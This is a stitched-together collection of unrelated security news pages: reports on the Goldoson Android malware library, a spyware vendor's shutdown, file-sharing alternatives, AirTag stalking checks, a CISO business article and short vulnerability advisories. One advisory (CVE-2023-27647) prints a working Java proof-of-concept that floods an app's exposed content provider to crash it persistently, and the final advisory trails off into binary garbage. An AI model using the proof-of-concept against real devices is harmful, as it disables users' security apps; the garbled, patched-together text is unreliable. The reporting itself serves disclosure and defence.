By Deeba Ahmed
The malware was identified by cybersecurity researchers at McAfee.
This is a post from HackRead.com Read the original post: Goldoson Android Malware Found in 60 Apps with 100M Downloads

****Goldson malware can collect data from apps installed on the device, as well as from Bluetooth- and Wi-Fi-connected devices.****

McAfee’s Mobile Research Team researchers discovered at least 60 malicious apps on Google Play Store infected with Android malware Goldoson. Collectively, these apps account for around 100 million installs on the Play Store and 8 million installs on the South Korean ONE Store. South Korean users are most vulnerable to downloading these apps.

**Goldoson Infiltrates Legit Apps on Play Store**

Researchers found that Goldoson Android malware has infiltrated the official Google Play Store via 60 legitimate apps. The malware component is based on a third-party library that all sixty apps use. Researchers assume that the developers mistakenly added it to the apps.

**Which Apps Are Infected with Goldoson?**

Some of the infected apps include the following:

Pikicast
GOM Player
LIVE Score
Infinite Slice
Real-Time Score
L.POINT with L.PAY
Swipe Brick Breaker
Bounce Brick Breaker
LOTTE WORLD Magicpass
Compass 9: Smart Compass
Korea Subway Info: Metroid
SomNote - Beautiful note app
GOM Audio - Music, Sync lyrics
Money Manager Expense & Budget

**How Does The Device Gets Infected?**

The Goldoson Android malware is designed to perform malicious actions on devices that download one of the 60 infected apps. Once the app is downloaded and launched, the malware library registers the app and receives its configuration from a remote server with an obfuscated domain.

This configuration sets the functions that the malware will run on the device, including ad-clicking and data-gathering features. The data collection function is activated every two days, and the collected data, along with the MAC address of connected Bluetooth and Wi-Fi devices, is transferred to a C2 server.

The ad-clicking feature is launched by loading and injecting HTML code into a hidden, customized WebView. This feature generates revenue through multiple URL visits. Overall, the Goldoson malware has been found in 60 different apps and has impacted a large number of downloads.

**What is Goldoson Malware Capable of?**

Goldson malware can collect data from apps installed on the device, as well as from Bluetooth- and Wi-Fi-connected devices. In addition, it can track users’ location and carry out ad fraud by clicking on ads in the background without alerting the user. Data collection relies on permissions given to an infected app when being installed. 

In a blog post, McAfee researchers stated that although Android 11 and above versions are generally considered safe against data theft due to their superior security protections, in 10% of the infected apps, Goldoson could collect sensitive data from devices running these versions.

McAfee responsibly alerted Google and the app developers, who promptly removed the malicious library from the apps. Apps in which they couldn’t remove the library were taken off the Play Store.

It is worth noting that malicious versions of these apps will still be available on third-party Android app stores even though on Play Store these apps will become safe with an update. Therefore, uninstall the app, and reinstall it from Play Store to be safe.

1.  Russian Android Spyware Tracks GPS Location
2.  Play Store Apps Drop Android Malware to Millions
3.  BRATA malware steals funds, factory resets phones

Goldoson Android Malware Found in 60 Apps with 100M Downloads

Malware that can steal data, track location, and perform click fraud was inadvertently built into apps via an infected third-party library, highlighting supply chain risk.

Malware that can steal data and commit click fraud has hitched a ride into 60 mobile apps, via an infected third-party library. The infected apps have logged more than 100 million downloads from the official Google Play store and are available in other app stores in South Korea, researchers have found.

Goldoson, discovered and named by researchers at McAfee Labs, can perform a variety of nefarious activities on Android-based devices, they said in a blog post. The malware can collect lists of applications installed, as well as sniff out the location of nearby devices via Wi-Fi and Bluetooth. It also can perform ad fraud by clicking advertisements in the background without the user's consent or knowledge, the researchers said.

Some of the popular apps affected by Goldoson include L.POINT with L.PAY, Swipe Brick Breaker, Money Manager Expense & Budget, Lotte Cinema, Live Score, and GOM. The researchers found more than 100 million downloads of infected apps on Google Play, and 8 million on ONE, South Korea's leading mobile app store, they said.

McAfee reported the infected apps to Google, which quickly notified developers that their apps were in violation of Google Play policies and that they needed to fix their apps, the researchers said. They do not mention in their post if they contacted the ONE app store.

Some apps were removed from Google Play outright while others were updated by the official developers. McAfee is encouraging users of any of the affected apps — a list of which is in the post — to update them to the latest version to remove any trace of Goldoson from their devices.

"While the malicious library was made by someone else, not the app developers, the risk to installers of the apps remains," SangRyol Ryu of McAfee's mobile research team wrote in the post.

**How Goldoson Works**

The Goldoson library registers a device right after it infects it, acquiring remote configurations from a command-and-control server (C2) as the app runs simultaneously. It evades detection by both varying and obfuscating the library name and the remote server domain with each application; developers dubbed it "Goldoson," because this is the first domain name they found, they said.

A remote configuration contains the parameters for each of the app's functionalities and specifies how often it runs the components.

"Based on the parameters, the library periodically checks, pulls device information, and sends them to the remote servers," Ryu wrote.

Goldoson's ability to collect data from all the apps on the device comes from a permission called "QUERY\_ALL\_PACKAGES," that it requests from the device. Users of devices with Android version 11 or above installed appear to be more protected from this query, with only about 10 percent of the cases observed by McAfee demonstrating vulnerability, the researchers said.

The malware requests permissions to access location, storage, or the camera at runtime from devices running Android 6.0 or higher. If location permission is allowed, the infected app can access not only GPS data but also Wi-Fi and Bluetooth info from devices nearby, which gives them more accuracy in locating the infected device, especially indoors, the researchers noted, adding that the ability to identify or discover the location of users puts them at risk for further malicious activity.

Goldoson can also load Web pages without the user knowing — a functionality that attackers can abuse to load ads for financial gain, the researchers said. In technical terms, this works because the library loads HTML code and injects it into a customized and hidden WebView, then produces hidden traffic by visiting the URLs recursively, they explained.

Goldoson sends data it collects from devices out every two days to the attackers, who can change this cycle using remote configuration.

**Third-Party Mobile App Component Risk**

The existence of Goldoson demonstrates once again how swiftly malicious activity can spread when it's a part of third-party or open source components that developers build into applications without knowing that they are infected, the researchers noted.

This was well documented in the Apache Log4j debacle — in which a logging library used in nearly all Java environments was found to contain an easily exploitable vulnerability. The repercussions of Log4j — which has been declared an endemic cyberthreat by the Department of Homeland Security because of how many existing applications remain vulnerable — likely will be felt for years to come.

Indeed, this ability to gain a large malicious footprint quickly and without organizations or developers knowing — and thus before they can react — has not been lost on attackers. In response, they increasingly are targeting the software supply chain with malware or exploits for Log4j and other known vulnerabilities — and will continue to do so as their successes mount, observes a security expert.

"Attackers are becoming more sophisticated in their attempts to infect otherwise legitimate applications across platforms," says Kern Smith, vice president for the Americas for sales engineering at mobile security firm Zimperium.

**Demand for Transparency**

Transparency across organizations and developers' teams appears to be the best way to mitigate software supply chain issues, experts said.

Both developers and organizations using applications that include open source or third-party components "need to assess the risks of these applications and their components, especially as it pertains to a software bill of materials (SBOM)," which provides an inventory of what comprises software components, Smith says.

Indeed, developers should be willing to reveal what libraries and other components are used in applications they develop and deliver to protect users and prevent compromise via infected or vulnerable components, McAfee researchers said.

Developers of external libraries also need to be transparent about their code so organizations and developers leveraging them can understand their behavior and thus be aware quickly of any issue that may arise, they said.

'Goldoson' Malware Sneaks into Google Play Apps, Racks Up 100M Downloads

A new Android malware strain named Goldoson has been detected in the official Google Play Store spanning more than 60 legitimate apps that collectively have over 100 million downloads.
An additional eight million installations have been tracked through ONE store, a leading third-party app storefront in South Korea.
The rogue component is part of a third-party software library used by the apps in

Mobile Security / Hacking

A new Android malware strain named **Goldoson** has been detected in the official Google Play Store spanning more than 60 legitimate apps that collectively have over 100 million downloads.

An additional eight million installations have been tracked through ONE store, a leading third-party app storefront in South Korea.

The rogue component is part of a third-party software library used by the apps in question and is capable of gathering information about installed apps, Wi-Fi and Bluetooth-connected devices, and GPS locations.

"Moreover, the library is armed with the functionality to perform ad fraud by clicking advertisements in the background without the user's consent," McAfee security researcher SangRyol Ryu said in a report published last week.

What's more, it includes the ability to stealthily load web pages, a feature that could be abused to load ads for financial profit. It achieves this by loading HTML code in a hidden WebView and driving traffic to the URLs.

Following responsible disclosure to Google, 36 of the 63 offending apps have been pulled from the Google Play Store. The remaining 27 apps have been updated to remove the malicious library.

Some of the prominent apps include -

*   L.POINT with L.PAY
*   Swipe Brick Breaker (removed)
*   Money Manager Expense & Budget
*   TMAP - 대리,주차,전기차 충전,킥보드를 티맵에서!
*   롯데시네마
*   지니뮤직 - genie
*   컬쳐랜드\[컬쳐캐쉬\]
*   GOM Player
*   메가박스 (removed), and
*   LIVE Score, Real-Time Score

The findings highlight the need for app developers to be transparent about the dependencies used in their software, not to mention take adequate steps to safeguard users' information against such abuse.

"Attackers are becoming more sophisticated in their attempts to infect otherwise legitimate applications across platforms," Kern Smith, vice president of sales engineering for the Americas at Zimperium, said.

"The use of third-party SDKs and code, and their potential to introduce malicious code into otherwise legitimate applications is only continuing to grow as attackers start to target the software supply chain to gain the largest footprint possible."

UPCOMING WEBINAR

Master the Art of Dark Web Intelligence Gathering

Learn the art of extracting threat intelligence from the dark web – Join this expert-led webinar!

Save My Seat!

The development comes as Cyble took the wraps off a new Android banking trojan dubbed Chameleon that has been active since January 2023 and is targeting users in Australia and Poland.

The trojan is no different from other banking malware spotted in the wild owing to its abuse of Android's accessibility services to harvest credentials and cookies, log keystrokes, prevent its uninstallation, and perform other nefarious activities.

It's also designed to display rogue overlays on top of a specific list of apps, intercept SMS messages, and even comprises an unused functionality that allows it to download and execute another payload.

Chameleon, true to its name, has a penchant for evasion by incorporating anti-emulation checks to detect if the device is rooted or it's being executed in a debugging environment, and if so, terminate itself.

To mitigate such threats, users are recommended to only download apps from trusted sources, scrutinize app permissions, use strong passwords, enable multi-factor authentication, and exercise caution when receiving SMS or emails from unknown senders.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Goldoson Android Malware Infects Over 100 Million Google Play Store Downloads

By Waqas
QuaDream, based in Ramat Gan, Israel, with around 40 employees, is known for its spyware used for hacking iPhones. 
This is a post from HackRead.com Read the original post: QuaDream, Israeli iPhone hacking spyware firm, to shut down

****QuaDream, an Israeli cyber mercenary, was recently exposed by Citizen Lab and Microsoft for developing spyware that hacks iPhones.****

QuaDream, a rival spyware developer of NSO Group, is reportedly preparing to shut down its operations. Employees of QuaDream have been summoned for a hearing, and it has been revealed that the company plans to lay off most of its employees, retaining only a small fraction to oversee the closure.

This decision comes amidst a survival crisis faced by the Israeli cyberattack industry, with several companies, including the cyberattack unit of Cognyte and Nemesis, reportedly shutting down. NSO Group also laid off 150 employees in the previous summer.

It is worth noting that Hackread.com also published a report on QuaDream titled “QuaDream: Israeli Cyber Mercenary Behind iPhone Hacks,” based on the findings of Citizen Lab and Microsoft. These findings may have played a significant role in QuaDream’s apparent demise.

Here’s what Eva Galperin, the Director of Cybersecurity at EFF (Electronic Frontier Foundation), had to say about the recent development:

> — Eva (@evacide) April 16, 2023

QuaDream, based in Ramat Gan, Israel, with around 40 employees, is known for its spyware used for hacking iPhones. Sources indicate that the company has notified its employees about the upcoming closure.

QuaDream’s operations have always been shrouded in mystery and came to the forefront recently after it sent a response letter to the Bat Yam Labor Court in defence of a lawsuit brought by a former employee.

Reportedly, in the letter, QuaDream cited a crisis in the cyberattack sector as the reason for laying off employees, with the industry’s downturn starting in 2018 when several companies publicly disclosed their activities, resulting in the blacklisting of Candiru and NSO by the US Chamber of Commerce in November 2011.

The crisis further deepened in early 2022 when the Israeli regulator announced a reduction in the number of countries where companies could sell their products, from 102 to 37, causing a severe economic crisis across the entire industry. By November 2022, businesses reported a significant negative trend, which also impacted QuaDream’s cash flow.

QuaDream was founded by Nimrod Reznik and Ilan Dabelstein, who still serve as senior managers. Its flagship product is an integrated software/hardware system that takes over local networks to hack phones connected to it.

Another popular product is software used for gaining remote access to phones. In 2022, Reuters reported that QuaDream had developed a no-interaction-based zero-click hacking tool similar to NSO Group’s products, which was in high demand among cybercriminals and espionage actors.

However, QuaDream faced a major setback when a report from Microsoft and Citizen Lab revealed that its hacking tools were used against advocacy organizations, journalists, and opposition figures in ten countries, including North America and Europe.

The report also suggested that the spyware used in these attacks was provided by QuaDream. Microsoft’s associate general counsel, Amy Hogan-Burney, emphasized the importance of publicly disclosing the activities of companies like QuaDream to hold them accountable.

Since the publication of this research, QuaDream has not been fully active, and its board of directors is now reportedly looking to sell its intellectual property.

1.  Zippyshare Quits Operation: 10 Best Alternatives
2.  Dark web market for stolen cards UniCC calls it quits
3.  Franco-Israeli Gang Linked to $40m CEO Scam Busted
4.  Israel Hit by Wave of Cyberattacks on Critical Networks
5.  Israeli Spyware Vendor Uses Chrome 0day to Hit Journalists
6.  European Spyware Vendor Sells Android & iOS Device Exploits

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

QuaDream, Israeli iPhone hacking spyware firm, to shut down

By Waqas
Zippyshare is no longer available after the service announced its shutdown on March 30th, 2023.
This is a post from HackRead.com Read the original post: 10 Best Zippyshare Alternatives – Best File Sharing Services

****With Zippyshare no longer available, users are now in search of alternative file hosting services to meet their needs. In this article, we will explore the top 10 Zippyshare alternatives that users can consider for their file hosting requirements.****

Zippyshare (Zippyshare.com) was a file hosting and sharing website that launched in 2006 and allowed users to upload and share files with others. Zippyshare provided a platform for users to store and share various types of files, including documents, images, videos, audio files, and more.

The service also allowed users to upload files to Zippyshare and generate download links that could be shared with others to download files.

Zippyshare had been known for its simplicity and ease of use, allowing users to quickly upload and share files without the need for an account or registration. It had been commonly used for sharing files in forums, blogs, and other online platforms, as well as for personal file-sharing purposes.

****Zippyshare Quits Operation****

As of February 2023, Zippyshare.com had a staggering 45 million daily visitors. However, on March 19th, 2023, the platform sent shockwaves through its user base as it announced March 30th, 2023 to be its last day of service.

Zippyshare.com cited multiple reasons for its decision to shut down, including a decline in ad revenue, increasing competition, rising electricity costs, and the widespread use of ad blockers, which collectively led to a significant decline in earnings.

As Zippyshare.com has ceased its operations, visitors to the site are greeted with a brief farewell message conveying the platform’s closure.

“Hello weary wanderer, Here lies Zippyshare , once upon a time a fairly big file hosting site blessed with a loyal and loving community. Before you leave, consider whether any of the following services will make your onward journey somehow easier and safer. Farewell.”

****Zippyshare Alternatives****

The thing about the internet is that one service goes down another one comes up. As a result, users seeking alternative file hosting and sharing websites can consider the following options:

**1\. **Mediafire****

Mediafire is a cloud-based file hosting and sharing service that allows users to upload, store, and share files with others. It provides a platform for users to store and share various types of files, including documents, images, videos, audio files, and more.

MediaFire offers both free and paid plans, with different features and storage limits. With a free account, users can upload and share files up to a certain storage limit, while paid plans offer larger storage limits, and additional features such as password protection, direct links, and ad-free file sharing.

Users can create accounts on MediaFire, upload files, and generate download links that can be shared with others. MediaFire also offers file management tools, such as file renaming, file deletion, and folder organization, to help users manage their uploaded files.

**2\. **Google Drive****

Google Drive is a widely used cloud storage service that allows users to store, share, and collaborate on files and folders. It offers up to 15GB of free storage per Google account and supports various file types, including documents, photos, videos, and more.

**3\. **Dropbox****

Dropbox is another popular cloud storage and file-sharing service that provides free and paid plans. It offers features such as file synchronization, file versioning, and sharing options with password protection and expiration dates. Dropbox also integrates with various third-party applications for enhanced functionality.

**4\. **Mega****

Mega is a cloud storage and file-sharing platform that offers end-to-end encryption for enhanced security. It provides free and paid plans with features like large file upload support, file versioning, and password protection for shared links.

**5\. **OneDrive****

OneDrive is a cloud storage and file-sharing service offered by Microsoft, which comes with free storage for Microsoft account holders. It allows users to store and share files and folders and offers features such as file synchronization, file versioning, and collaboration tools.

**6\. **4Shared****

4Shared is a file hosting and sharing website that allows users to upload, store, and share files with others. It provides a platform for users to store and share various types of files, including documents, images, videos, music, and more. 4Shared allows users to create accounts, upload files, and generate download links that can be shared with others, facilitating file sharing and collaboration.

4Shared offers both free and paid plans, with different features and storage limits. It has been used for personal file sharing, online backup, and collaborative file sharing purposes. Users can also search for and access files shared by others on the 4Shared platform.

**7\. **FileFactory****

FileFactory is a cloud-based file hosting and sharing service that allows users to upload, store, and share files with others. It provides a platform for users to store and share various types of files, including documents, images, videos, music, and more.

FileFactory allows users to create accounts, upload files, and generate download links that can be shared with others, facilitating file sharing and collaboration. FileFactory provides features such as file encryption, password protection, and download tracking to enhance file security and control. FileFactory offers both free and paid plans.

**8\. **AnonFiles****

AnonFiles is a file hosting and sharing website that allows users to upload and share files anonymously. It provides a platform for users to store and share various types of files, including documents, images, videos, audio files, and more. AnonFiles.com does not require users to create accounts or register, allowing for anonymous file sharing.

Users can upload files to AnonFiles and generate download links that can be shared with others, enabling them to download the files. AnonFiles.com also provides options for password protection and file expiration, allowing users to add additional security measures to their shared files.

**9\. **WeTransfer****

WeTransfer is a cloud-based file transfer service that allows users to send and share large files with others. It provides a simple and user-friendly interface for uploading and sending files, making it easy to share files with colleagues, clients, friends, or family.

WeTransfer offers a free plan that allows users to send files up to 2GB in size, with a limit of 20 transfers per week. Files are stored on WeTransfer’s servers for a limited time, typically 7 days, and users can choose to send files via email or by generating a download link that can be shared with others.

WeTransfer also offers a paid plan called WeTransfer Plus, which provides additional features such as increased file transfer size (up to 20GB), longer storage duration (up to 100GB), password protection for shared files, and customizable backgrounds for download pages, among others.

**10\. **pCloud****

pCloud is a cloud storage service that allows users to store, share, and synchronize files and data online. It provides a platform for users to upload, store, and access files, photos, videos, documents, and other types of data in the cloud, making them accessible from anywhere with an internet connection.

pCloud.com offers various features such as file syncing, file sharing, file versioning, and encryption to ensure data security and privacy. It also offers mobile apps for iOS and Android devices, as well as desktop apps for Windows, macOS, and Linux operating systems, making it convenient for users to access and manage their files across different devices.

pCloud.com offers both free and paid plans with different storage capacities and features to suit the needs of different users and businesses. Since the site is based in Europe, it fully complies with GDPR which means respect for user privacy and data protection.

****Beware of malicious files****

When downloading files from an email or any of the aforementioned Zippyshare alternatives, it’s important to be cautious of potentially malicious files. To ensure the safety of your device and data, always scan downloaded files using reputable antivirus software or online scanning services like VirusTotal, FileScan, or Any.Run.

This will help detect and mitigate any potential threats before they can harm your device or compromise your security. Stay vigilant and prioritize your cybersecurity when downloading files from any source, including file hosting and sharing websites.

****Conclusion****

These websites provide similar features such as uploading, storing, and sharing files with others, and may offer different plans, storage limits, and additional features. It’s important to review the terms of service and privacy policy of these websites to ensure compliance and up-to-date information.

1.  Tor and Its 10 Best Alternatives
2.  5 Best Internet Service Locators
3.  The Best Alternatives Operating Systems
4.  Tor domain remains online after Feds seize Z-Library sites
5.  Best legal, free online streaming sites for movies, TV shows

10 Best Zippyshare Alternatives – Best File Sharing Services

Categories: News
Tags: Lock and Code S04E09

Tags:  Bennett Cyphers

Tags:  Apple vulnerability

Tags:  phone charging station

Tags:  FBI

Tags:  Yum! Brands

Tags:  KFC

Tags:  Pizza Hut

Tags:  Patch Tuesday

Tags:  sextortion

Tags:  malvertising

Tags:  Weebly

Tags:  AI

Tags:  virtual kidnapping

Tags:  ransomware review

Tags:  ransomware in the UK

Tags:  ransomware in France 

The most interesting security related news from the week of April 10 - 16.



(Read more...)




The post A week in security (April 10 - 16) appeared first on Malwarebytes Labs.

Cybersecurity info you can't do without

Want to stay informed on the latest news in cybersecurity? Sign up for our newsletter and learn how to protect your computer from threats.

Cyberprotection for every one.

FOR PERSONAL

Windows

Mac

iOS

Android

VPN Connection

SEE ALL

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

FOR BUSINESS

Small Businesses

Mid-size Businesses

Large Enterprise

Endpoint Protection

Endpoint Detection & Response

Managed Detection and Response (MDR)

FOR PARTNERS

Managed Service Provider (MSP) Program

Resellers

MY ACCOUNT

Sign In

SOLUTIONS

Free Rootkit Scanner

Free Trojan Scanner

Free Virus Scanner

Free Spyware Scanner

Anti Ransomware Protection

SEE ALL

ADDRESS

3979 Freedom Circle  
12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay  
2nd Floor  
Cork T12 X8N6  
Ireland

LEARN

Malware

Hacking

Phishing

Ransomware

Computer Virus

Antivirus  

What is VPN?

COMPANY

About Us

Contact Us

Careers

News and Press

Blog

Scholarship

Forums

MY ACCOUNT

Sign In

ADDRESS

3979 Freedom Circle, 12th Floor  
Santa Clara, CA 95054

ADDRESS

One Albert Quay, 2nd Floor  
Cork T12 X8N6  
Ireland

A week in security (April 10 - 16)

If you’re worried that one of Apple’s trackers is following you without consent, try these tips.

When the AirTag launched in 2021, Apple’s Bluetooth tracker with ultra-wideband was lauded as a step toward the future of augmented reality and a great way to find everyday objects, like your lost TV remote. Cybersecurity experts expressed concern that the tracking device would be exploited by stalkers.

The warnings were prescient; multiple women reported frightening encounters where AirTags were used as stalking devices that could be slipped in a purse or taped to a car. Police departments across the United States issued warnings about the potential criminal uses of AirTags. Newer AirPods have tracking abilities similar to AirTags, but the higher cost of Apple’s earbuds limits their disposability as a tracking device.

Apple released firmware updates late in 2022 in an effort to curb misuse. Even though Tile and other competitors to the AirTag exist, the vastness of Apple’s ecosystem sets the device apart. From the US Drug Enforcement Administration using it to track international drug shipments to a man in Texas using it to find his stolen car and kill the suspect, AirTags are everywhere.

If you are concerned that a secret AirTag may be recording your location, these signs may help detect the tracker.

Signs an AirTag Is Tracking You

The type of smartphone you own affects how easily you can discover hidden AirTags. Owners of iPhones running iOS 14.5 or newer should receive a push alert whenever an unknown AirTag is nearby for an extended period of time and away from its owner. Apple’s website does not provide an exact time frame for when this alert is triggered.

Owners of newer iPhones should turn on Bluetooth and check their settings to ensure they’ll receive notifications. Under **Settings**, go to **Privacy & Security**, and toggle **Location Services** on. Scroll to the bottom of that page, tap on **System Services**, and activate **Find My iPhone**. Also, search for the **Find My** app, visit **Me** in the bottom right corner, then tap **Customize Tracking Notifications** to double-check that notifications are enabled.

When you click on the iPhone alert for an unrecognized AirTag, you may be given the option to play a sound on the AirTag to help locate it. If your iPhone runs iOS 16.2 or later, you might be able to use precision location data to find the hidden device.

Months after the release of the AirTag, Apple launched the Tracker Detect app for Android phones. Unlike the security features available for the iPhone, the Android app does not automatically look for unknown AirTags. Users must initiate the scan.

According to Eva Galperin, director of cybersecurity at the Electronic Frontier Foundation, the reason for the app’s limited functionality is complicated. “This is actually a limitation of how the Android ecosystem works and how Android apps can work,” she says. “I have called on Apple and Android to work together to incorporate the level of mitigations that Apple provides in iOS into the Android operating system, but this requires a lot of cooperation between two groups who are normally rivals.”

While some guides to finding AirTags recommend using Bluetooth scanners, Galperin does not consider this method to be reliable for tracker searching. “I have tried using various Bluetooth scanners in order to detect AirTags, and they do not work all the time,” she says.

Millions of Americans still do not own a smartphone. Without a device on hand, you must rely on visual and audible clues to find any hidden AirTags. The circular white disc is slightly larger than a quarter. As reported by _The New York Times_, Ashley Estrada discovered an AirTag lodged under her license plate, and her video documenting the incident was viewed over 20 million times on TikTok.

When the AirTag was first released, the tracker would emit a beeping noise if away from the owner for longer than three days. Apple has since shortened the time to 24 hours or less. Despite the update, you might not want to rely only on sound to detect AirTags. Numerous videos on YouTube offer DIY instructions to disable the speaker, and noiseless versions of the trackers were even listed for a short time on Etsy.

What if I Find One?

The best way to disable an AirTag is to remove the battery. To do this, flip the AirTag so the metallic side with an Apple logo is facing you. Press down on the logo and turn counterclockwise. Now you will be able to remove the cover and pop out that battery.

Apple’s support page for the AirTag suggests reaching out to the police if you believe you are in a dangerous situation. “If you feel your safety is at risk, contact your local law enforcement, who can work with Apple to request information related to the item,” the support page reads. “You might need to provide the AirTag, AirPods, Find My network accessory, and the device's serial number.” One way to figure out the serial number is to hold the top of an iPhone or other near-field-communication-enabled smartphone to the white side of an AirTag. A website with the serial number will pop up.

This page may also include a partial phone number from the person who owns the tracking device. If you feel hesitant about scanning the AirTag or do not have the ability, a serial number is printed on the device beneath the battery.

Who Does This Affect?

In the viral stories shared online and in police reports, women are often the victims of AirTag stalking, but Galperin cautions against framing unwanted tracking as solely an issue for women. “I have been working with victims of tech-enabled abuse for many years,” she says, “and I would say that about two-thirds of the survivors that come to me are women. But a third of them are men. I suspect that number would be higher if there wasn't such a stigma around being an abuse victim or survivor.”

She emphasized how men, women, and nonbinary people can all be victims of abuse, as well as perpetrators. “When we paint it all with this really broad brush, we make it really hard for victims who don’t fit that mold to come forward,” says Galperin.

For more resources, you can visit the website for the National Domestic Violence Hotline. Contact the hotline by calling 1-800-799-7233 or texting “START” to 88788.

Are You Being Tracked by an AirTag? Here’s How to Check

An issue found in DUALSPACE Lock Master v.2.2.4 allows a local attacker to cause a denial of service or gain sensitive information via the com.ludashi.superlock.util.pref.SharedPrefProviderEntryMethod: insert of the android.net.Uri.insert method.

**Denial of Service exists in Lock Master（CVE-2023-27647）**

Vendor：DUALSPACE(http://www.dualspace.com/pc/en/products.html)

Affected product：Lock Master (com.ludashi.superlock)

Version：2.2.4

Download link：https://app-lock-master.en.uptodown.com/android/download

Description of the vulnerability for use in the CVE：An issue found in DUALSPACE Lock Master v.2.2.4 allows a local attacker to cause a denial of service or gain sensitive information via the com.ludashi.superlock.util.pref.SharedPrefProvider EntryMethod: insert of the android.net.Uri.insert method.

Additional information：Lock Master is a security app, which can block access to user's apps or files with lock patterns. Upon opening the app, it loads the SharedPreference files into memory. If a malicious app injects a large amount of data into these files, the Lock Master app will load excessive data into memory, which can trigger an OOM error and cause the app to crash. Even worse, simply restarting the app will not fix the security issue, as the injected data is persistent in the SharedPreference files. In practice, this means that the Lock Master app becomes unable to launch successfully.

poc：

ContentResolver contentResolver = this.getApplicationContext().getContentResolver();
Uri uri = Uri.parse("content://com.ludashi.superlock.main.SharedPrefProvider");  
ContentValues contentValues = new ContentValues();
while(true){
  contentValues.put("file\_name","key\_local\_locked\_apps");
	contentValues.put("type",4);
	contentValues.put("key",randomString);
	contentValues.put("value",randomString);
	contentResolver.insert(uri, contentValues); 
}

CVE-2023-27647: SODA/CVE detail.md at main · LianKee/SODA

Focusing on what customers and partners need from a company can help CISOs show the real financial benefits of improving cybersecurity.

Security has historically been seen as a cost center, which has led to it being given as little money as possible. Many CISOs, CSOs, and CROs fed into that image by primarily talking in terms of disaster avoidance, such as data breaches hurting the enterprise and ransomware potentially shutting it down.

But what if security presented itself instead as a way to boost revenue and increase market share? That could easily shift those financial discussions into something much more comfortable.

For example, Apple touted its investments into the secure enclave to claim that it offers users better privacy. Specifically, the company argued that it couldn't reveal information to federal authorities because the enclave was just that secure. Apple turned that into a powerful competitive argument against rival Android creator Google, which makes much of its revenue by monetizing users' data.

In another scenario, bank regulations require financial institutions to reimburse customers who are victimized by fraudsters, but they carve out an exception for wire fraud. Imagine a bank realizes that covering all fraud — even though it is not required to do so — could be a powerful differentiator that would boost its market share by supporting customers better than competitors do. How can the bank afford to do this? It increases security investments to the point where the projected fraud losses are materially less than the projected increase in revenue.

Or look at the case of a cloud provider, which could differentiate itself from most major cloud providers by improving uptime performance by focusing on reducing DDoS attack damage. Even further afield, an agriculture company that invested in better security could improve trust and bring in more partners, thus expanding into lucrative new markets. A wide range of companies can make the case for improving overall business performance by improving cybersecurity.

**Case Study: Brokering Cyber Insurance**

Another example of leveraging security to explicitly boost revenue comes from Marsh McLennan, a $10 billion business that bills itself as the world's largest insurance broker.

One of the biggest recent trends in cybersecurity insurance are insurance companies refusing to insure many enterprises because the enterprise does not have security that meets the strict requirements of that insurer. Although this does limit their potential losses, it also immediately threatens insurance companies' revenue because of the loss of premium income.

To maximize the number of companies that it can deliver to insurance companies, and thereby maintain its own revenue, Marsh evaluates companies. When a company's security profile isn't sufficient, Marsh taps its security company partners to bring that potential client's security profile up to where it qualifies for a policy with the insurance company. That's good for the company because it is able to get insurance and enjoy better security, it's good for the insurance company because it gets the premium revenue, and it's good for Marsh, which makes a proper and successful referral.

"We look at the client relationship as a holistic life cycle. Placing insurance is our bread and butter," says Katherine Keefe, leader of cyber incident management at Marsh. "Our clients need support in readiness: how to prepare, how to develop an incident response plan \[or\] tabletop exercises. We provide them with tools and solutions and support cyber preparation."

**Shifting From Defense to Growth**

Stephen Boyce, a director at Magnet Forensics, argues that when enterprise security executives focus on what prospects care about, and therefore help with revenue and market share, it can be the single most effective way to improve the security posture.

"What it does is create a shift in the relationship dynamic between the CISO and the CFO, and potentially the rest of the C-level team," Boyce says.

This does indeed have the potential to change the relationship dynamic, but SailPoint CISO Rex Booth stresses that such a change can only happen if the enterprise is ready for it. And, he adds, many are not yet.

"For way too long, security has been \[focused\] on conflict, where it should be an enabling function. And that does require a shift in the relationship dynamic of the CISO — a role that has traditionally been seen as purely risk reduction," Booth says. "This needs to happen at the proportion of companies that are mature enough to take their CISO and dual-hat them into not only a security role, but a revenue-generating role. Some are migrating in this direction, but most organizations are not there yet."

**Proving Value by Improving the Business**

Still, Booth says there are pros and cons at play. The argument against such a change — or at least slowing it way down — is that security departments today are severely underbudgeted, which means they are understaffed and find it difficult to properly defend the enterprise. That suggests that attempts to support sales will further dilute their attention and make a bad situation potentially worse.

The counter to that is that underbudgeted security operations are likely to always be underbudgeted. By making periodic moves to help sales — maybe just once or twice a year — it could illustrate to the CFO, the COO, the CEO, and the board the potential for using security to help with the bottom line. And, in theory, that could meaningfully contribute to security being budgeted a little better, which itself could be a huge help in defending the enterprise.

That is even more critical given that the core efforts of security are often difficult to prove from a value ROI perspective.

"If I do everything right from a security perspective, there's no way for me to tell the board, 'I saved you $2 million because of those ransomware events that never happened,'" Booth says.

The goal should go beyond getting prospects to convert to customers and increasing market share and needs to include customer retention, argues Bob Hansmann, cyber-risk and security product marketing leader for Infoblox.

"The enterprise needs to make sure that the services are not just up and available, but that they run smoothly," Hansmann says. "And security is the unit that is best positioned — in terms of experience, talent, and tools — to make that happen."

Security Is a Revenue Booster, Not a Cost Center

PAX Technology PAX A920 Pro PayDroid 8.1suffers from a Race Condition vulnerability, which allows attackers to bypass the payment software and force the OS to boot directly to Android during the boot process.

�-��5\]ה��3��n���'��W5��k.?�\`A�p���A���V�����x�\]b%v�l(����8���G+�&�� ���iM8�}��2i��0����Zʴ�\]uφ�vǴ#�h���:V�%O�Q��h��Eec\*J�SO�BǞ����2 ����Ļ(ʱ�FcH��UG���q�L��5��(|ޤ�ԏ�AV��B�=,�� � 7�e��1..p�9�nr��"Qj\]d� s�������pE�p���\`��Az�;������5M���Ȕ7M�xb�e�V5n�!�F�7����LM�\*�k�T0�bqB<�rcN����R98��8���:�r^W��3��Wƫ��yyù� Qz�0�;ǫ�^�ŏA)��cS\[�6���$�0\*�}�N��ޤ&6�T���8U

Tag

#android